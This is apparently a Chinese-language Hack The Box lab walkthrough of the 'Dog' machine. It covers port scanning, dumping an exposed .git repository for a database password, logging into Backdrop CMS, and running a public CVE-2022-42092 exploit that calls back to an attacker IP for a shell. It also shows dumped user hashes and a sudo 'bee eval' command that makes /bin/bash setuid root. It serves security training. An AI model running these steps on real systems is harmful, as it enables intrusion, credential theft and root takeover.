Dog
1. 信息收集
1.1. 端口扫描
┌──(root㉿kali)-[~/Desktop/htb/dog]
└─# nmap 10.10.11.58 -p- --min-rate 10000
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-10 10:50 EDT
Warning: 10.10.11.58 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.11.58
Host is up (0.077s latency).
Not shown: 61067 closed tcp ports (reset), 4466 filtered tcp ports (no-response)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 15.76 seconds
┌──(root㉿kali)-[~/Desktop/htb/dog]
└─# nmap 10.10.11.58 -p 22,80 -sCV
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-10 10:57 EDT
Nmap scan report for dog.htb (10.10.11.58)
Host is up (0.077s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.12 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 97:2a:d2:2c:89:8a:d3:ed:4d:ac:00:d2:1e:87:49:a7 (RSA)
| 256 27:7c:3c:eb:0f:26:e9:62:59:0f:0f:b1:38:c9:ae:2b (ECDSA)
|_ 256 93:88:47:4c:69:af:72:16:09:4c:ba:77:1e:3b:3b:eb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 22 disallowed entries (15 shown)
| /core/ /profiles/ /README.md /web.config /admin
| /comment/reply /filter/tips /node/add /search /user/register
|_/user/password /user/login /user/logout /?q=admin /?q=comment/reply
| http-git:
| 10.10.11.58:80/.git/
| Git repository found!
| Repository description: Unnamed repository; edit this file 'description' to name the...
|_ Last commit message: todo: customize url aliases. reference:https://docs.backdro...
|_http-generator: Backdrop CMS 1 (https://backdropcms.org)
|_http-title: Home | Dog
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.45 seconds
1.2. 目录扫描
┌──(root㉿kali)-[~/Desktop/htb/dog]
└─# dirsearch -u http://10.10.11.58 -x 403
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
from pkg_resources import DistributionNotFound, VersionConflict
_|. _ _ _ _ _ _|_ v0.4.3
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25
Wordlist size: 11460
Output File: /root/Desktop/htb/dog/reports/http_10.10.11.58/_25-07-12_09-18-43.txt
Target: http://10.10.11.58/
[09:18:43] Starting:
[09:18:47] 301 - 309B - /.git -> http://10.10.11.58/.git/
[09:18:47] 200 - 95B - /.git/COMMIT_EDITMSG
[09:18:47] 200 - 604B - /.git/
[09:18:47] 200 - 409B - /.git/branches/
[09:18:47] 200 - 92B - /.git/config
[09:18:47] 200 - 73B - /.git/description
[09:18:47] 200 - 23B - /.git/HEAD
[09:18:48] 200 - 650B - /.git/hooks/
[09:18:48] 200 - 455B - /.git/info/
[09:18:48] 200 - 240B - /.git/info/exclude
[09:18:48] 200 - 476B - /.git/logs/
[09:18:48] 200 - 230B - /.git/logs/HEAD
[09:18:48] 301 - 325B - /.git/logs/refs/heads -> http://10.10.11.58/.git/logs/refs/heads/
[09:18:48] 200 - 230B - /.git/logs/refs/heads/master
[09:18:48] 301 - 319B - /.git/logs/refs -> http://10.10.11.58/.git/logs/refs/
[09:18:48] 200 - 461B - /.git/refs/
[09:18:48] 301 - 320B - /.git/refs/heads -> http://10.10.11.58/.git/refs/heads/
[09:18:48] 200 - 41B - /.git/refs/heads/master
[09:18:48] 301 - 319B - /.git/refs/tags -> http://10.10.11.58/.git/refs/tags/
[09:18:48] 200 - 2KB - /.git/objects/
[09:18:48] 200 - 337KB - /.git/index
[09:19:04] 301 - 309B - /core -> http://10.10.11.58/core/
[09:19:12] 301 - 310B - /files -> http://10.10.11.58/files/
[09:19:12] 200 - 624B - /files/
[09:19:14] 200 - 4KB - /index.php
[09:19:14] 404 - 2KB - /index.php/login/
[09:19:15] 200 - 456B - /layouts/
[09:19:16] 200 - 7KB - /LICENSE.txt
[09:19:18] 301 - 312B - /modules -> http://10.10.11.58/modules/
[09:19:18] 200 - 399B - /modules/
[09:19:24] 200 - 5KB - /README.md
[09:19:25] 200 - 528B - /robots.txt
[09:19:26] 200 - 0B - /settings.php
[09:19:30] 301 - 310B - /sites -> http://10.10.11.58/sites/
[09:19:32] 301 - 311B - /themes -> http://10.10.11.58/themes/
[09:19:32] 200 - 454B - /themes/
Task Completed
1.3. git泄露
发现存在 10.10.11.58:80/.git/
使用 GitHack dump下来
python3 GitHack.py 10.10.11.58:80/.git/
直接给他整个git仓库dump下来了,内容很多
比较关键的就是 /setting.php 中的内容
#以下是比较关键的内容
$database = 'mysql://root:BackDropJ2024DS2024@127.0.0.1/backdrop';
BackDropJ2024DS2024
$settings['hash_salt'] = 'aWFvPQNGZSz1DQ701dD4lC5v1hQW34NefHvyZUzlThQ';
获取到了数据库的密码 BackDropJ2024DS2024
1.4. web
打开网站后可以登录,没找到注册的按钮, 随便试了一下弱口令,没有成功。
在前面,我获取到了数据库的密码,很可能也是网站的某个用户的密码,于是继续从里面寻找一个用户,看看.git里面有没有用户的相关信息。
因为用户名也可以用邮箱,那我只要全局搜索邮箱后缀即可
通过grep @dog.htb 我发现了一个用户邮箱 tiffany@dog.htb
┌──(root㉿kali)-[~/…/htb/dog/GitHack/10.10.11.58]
└─# grep -r '@dog.htb'
files/config_83dddd18e1ec67fd8ff5bba2453c7fb3/active/update.settings.json: "tiffany@dog.htb"
利用 tiffany@dog.htb / BackDropJ2024DS2024 登录成功
浏览器插件也帮我识别出来了CMS是Backdrop
找下对应的漏洞
git clone https://github.com/ajdumanhug/CVE-2022-42092
python3 CVE-2022-42092.py http://10.10.11.58 'tiffany@dog.htb' 'BackDropJ2024DS2024' 10.10.14.94 4321
1.6. 数据库
进来后看数据库,
mysql> select * from users;
+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+------------+------------+------------+--------+----------+----------+---------+----------------------------+------------+
| uid | name | pass | mail | signature | signature_format | created | changed | access | login | status | timezone | language | picture | init | data |
+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+------------+------------+------------+--------+----------+----------+---------+----------------------------+------------+
| 0 | | | | | NULL | 0 | 0 | 0 | 0 | 0 | NULL | | 0 | | NULL |
| 1 | jPAdminB | $S$E7dig1GTaGJnzgAXAtOoPuaTjJ05fo8fH9USc6vO87T./ffdEr/. | jPAdminB@dog.htb | | NULL | 1720548614 | 1720584122 | 1720714603 | 1720584166 | 1 | UTC | | 0 | jPAdminB@dog.htb | 0x623A303B |
| 2 | jobert | $S$E/F9mVPgX4.dGDeDuKxPdXEONCzSvGpjxUeMALZ2IjBrve9Rcoz1 | jobert@dog.htb | | NULL | 1720584462 | 1720584462 | 1720632982 | 1720632780 | 1 | UTC | | 0 | jobert@dog.htb | NULL |
| 3 | dogBackDropSystem | $S$EfD1gJoRtn8I5TlqPTuTfHRBFQWL3x6vC5D3Ew9iU4RECrNuPPdD | dogBackDroopSystem@dog.htb | | NULL | 1720632880 | 1720632880 | 1723752097 | 1723751569 | 1 | UTC | | 0 | dogBackDroopSystem@dog.htb | NULL |
| 5 | john | $S$EYniSfxXt8z3gJ7pfhP5iIncFfCKz8EIkjUD66n/OTdQBFklAji. | john@dog.htb | | NULL | 1720632910 | 1720632910 | 0 | 0 | 1 | UTC | | 0 | john@dog.htb | NULL |
| 6 | morris | $S$E8OFpwBUqy/xCmMXMqFp3vyz1dJBifxgwNRMKktogL7VVk7yuulS | morris@dog.htb | | NULL | 1720632931 | 1720632931 | 0 | 0 | 1 | UTC | | 0 | morris@dog.htb | NULL |
| 7 | axel | $S$E/DHqfjBWPDLnkOP5auHhHDxF4U.sAJWiODjaumzxQYME6jeo9qV | axel@dog.htb | | NULL | 1720632952 | 1720632952 | 0 | 0 | 1 | UTC | | 0 | axel@dog.htb | NULL |
| 8 | rosa | $S$EsV26QVPbF.s0UndNPeNCxYEP/0z2O.2eLUNdKW/xYhg2.lsEcDT | rosa@dog.htb | | NULL | 1720632982 | 1720632982 | 0 | 0 | 1 | UTC | | 0 | rosa@dog.htb | NULL |
| 10 | tiffany | $S$EEAGFzd8HSQ/IzwpqI79aJgRvqZnH4JSKLv2C83wUphw0nuoTY8v | tiffany@dog.htb | | NULL | 1723752136 | 1723752136 | 1752332047 | 1752332065 | 1 | UTC | | 0 | tiffany@dog.htb | NULL |
+-----+-------------------+---------------------------------------------------------+----------------------------+-----------+------------------+------------+------------+------------+------------+--------+----------+----------+---------+----------------------------+------------+
可以看到有很多用户
识别一下
┌──(root㉿kali)-[~/Desktop/htb/dog/CVE-2022-42092]
└─# hash-identifier $S$EEAGFzd8HSQ/IzwpqI79aJgRvqZnH4JSKLv2C83wUphw0nuoTY8v
#########################################################################
# __ __ __ ______ _____ #
# /\ \/\ \ /\ \ /\__ _\ /\ _ `\ #
# \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ #
# \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ #
# \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ #
# \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ #
# \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.2 #
# By Zion3R #
# www.Blackploit.com #
# Root@Blackploit.com #
#########################################################################
--------------------------------------------------
Not Found.
发现都识别不出来。那我估计这种多半爆都爆不出来。
先看看有哪些用户
www-data@dog:/home$ ls
jobert johncusack
尝试利用数据库的密码切换
www-data@dog:/home$ su johncusack
Password: BackDropJ2024DS202
johncusack@dog:/home$ whoami
johncusack
发现 johncusack 用户的密码和数据库的密码相同
2. bee 提权
johncusack@dog:~$ sudo -l
[sudo] password for johncusack: BackDropJ2024DS202
Matching Defaults entries for johncusack on dog:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User johncusack may run the following commands on dog:
(ALL : ALL) /usr/local/bin/bee
bee 是一个用于管理 Backdrop CMS 的命令行工具。它允许你通过命令行执行各种任务,包括配置管理、数据库操作、项目(模块/主题)管理、用户管理等。
参考使用文档构造命令
Usage · backdrop-contrib/bee Wiki · GitHub
johncusack@dog:~$ sudo /usr/local/bin/bee --root=/var/www/html eval 'system("chmod +s /bin/bash");'
johncusack@dog:~$ ls -l /bin/bash
-rwsr-sr-x 1 root root 1183448 Apr 18 2022 /bin/bash
